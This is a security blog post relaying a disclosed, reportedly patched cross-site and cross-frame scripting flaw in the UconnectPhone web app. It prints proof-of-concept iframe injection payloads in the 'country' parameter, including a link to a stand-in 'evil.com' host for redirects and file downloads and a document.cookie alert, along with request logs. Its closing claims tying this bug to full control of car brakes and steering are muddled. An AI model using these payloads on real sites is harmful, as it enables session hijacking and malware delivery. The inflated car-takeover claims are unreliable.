Bugs In UconnectPhone WebApp Which Allows Attacker To OWn A Remote System Of A Car

This Year we heard about a BMW hack which was found by Benjamin Kunz Mejri of the Vulnerability Lab, About last week also another team member of the Vulnerability Lab Team name SaifAllah benMassaoud, He disclosed two bugs which are Cross Frame Scripting (XFS) and Cross Site Scripting, A type of attack which combine malicious JavaScript with an Iframe.

Let’s take a look at this simple scenario on how this attack works.

User using touch screen to select their country, But an attacker can load a malicious script which then send those details to the attacker.

Proof Of Concepts And How To Reproduce For Penetration Testers

The missing of x-frame-options header was detected on the uconnect-phone web-application and there is no protection against external requested sources.

— PoC Session Logs —
Host: www.uconnectphone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

PoC: Attack Scheme

[Malicious Site + IP Adress/Redirection + File]:=[download]

PoC: Exploitation

http://www.uconnectphone.com/?region=NAFTA&country= “><iframe src=”http://evil.com/ & IP adress/[Redirect & Download File”></iframe>&request_locale=en&brand=none&selection=2

PoC: Payload

“><iframe src=”http://evil.com/ & IP adress/[redirect & Download File”></iframe>

— PoC Session Logs [GET] —

/?region=NAFTA&country=”><iframe src=”http://evil.com/ & IP adress/[redirect & Download File”></iframe>&request_locale=en&brand=none&selection=2 HTTP/1.1
Host: www.uconnectphone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

Via Browsers

http://www.uconnectphone.com/?region=NAFTA&country= “><iframe src=”javascript:alert(document.cookie)”></iframe>&request_locale=en&brand=none&selection=2

— PoC Session Logs [GET] —
/?region=NAFTA&country=”><iframe src=”javascript:alert(document.cookie)”></iframe>&request_locale=en&brand=none&selection=2 HTTP/1.1
Host: www.uconnectphone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

Once the victim enters the credentials into the legitimate site within the iframe context. The malicious JavaScript finally steals the keystrokes. The vulnerability is located in the `country` parameter GET method request. Attacker might redirect the victim to a web-page, that automatically downloads some malicious file.
The dangerous variant of this attack is that an attacker could also exploit the vulnerability of the software like this:

The attacker can send a malicious link for the victim to download a malicious PDF file to the victim which he can uses to exploit an outdated version of Adobe Reader or allows him to download a malicious APK file that can be used to exploit the victim Android Operating System.

This scenario would allow an offensive attacker to own the remote computer system of the cars connected like `Chrysler, Dodge, FIAT, Jeep & Ram`, that is used for `Uconnect Access` for the vehicle connectivity system and that runs finally the integrated Android Auto v8.4 Uconnect system. The vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.

UcoonectPhone WebApp API
FCA US LLC
Product : UconnectPhone – Web App ( API )
[+] Advisory : https://www.vulnerability-lab.com/get_content.php?id=2020
[+] Fix & Patch : The Vulnerability it has been patched by FCA Team

Hackers are always using some new way to trick cars and this attack is usually only successful when combined with social engineering , More cars become mobile, internet-connected appliances, they become more likely targets for Phishing attacks & remote hacking. Hopefully Chrysler, Dodge, FIAT, Jeep & Ram …The hack uses the Uconnect system as a gateway into the car, and then gains the access to the Jeep’s infotainment system headunit. Once there, the firmware of the headunit , which allows access to the whole CAN bus of the car – essentially, the car’s nervous system – and that access is what allows for the really scary stuff, like control of the wipers, Brakes, throttle and even some limited control (in reverse only, for now) of the steering.
Uplink, an Internet-connected computer feature in hundreds of thousands of Fiat Chrysler cars, SUVs, and trucks, controls the vehicle’s entertainment and navigation, enables phone calls, and even offers a Wi-Fi hot spot …
For Exemple : If you Allow Uconnect access your contacts and call history , the System tell you to visite Uconnectphone => vulnerable web app / , if you navigate , You Fair Hacked , as i said ” hackers are always using some new way to trick cars ” sure, it is nice demonstration of the attack using this 2 vulnerabilities , but it’s not exactly an easy one to just find .. as many researchers says “Super nice one “

Pythonista By Passion And Hacker By Interest, Let's connect on Facebook And Twitter.

Leave a Reply

Your email address will not be published. Required fields are marked *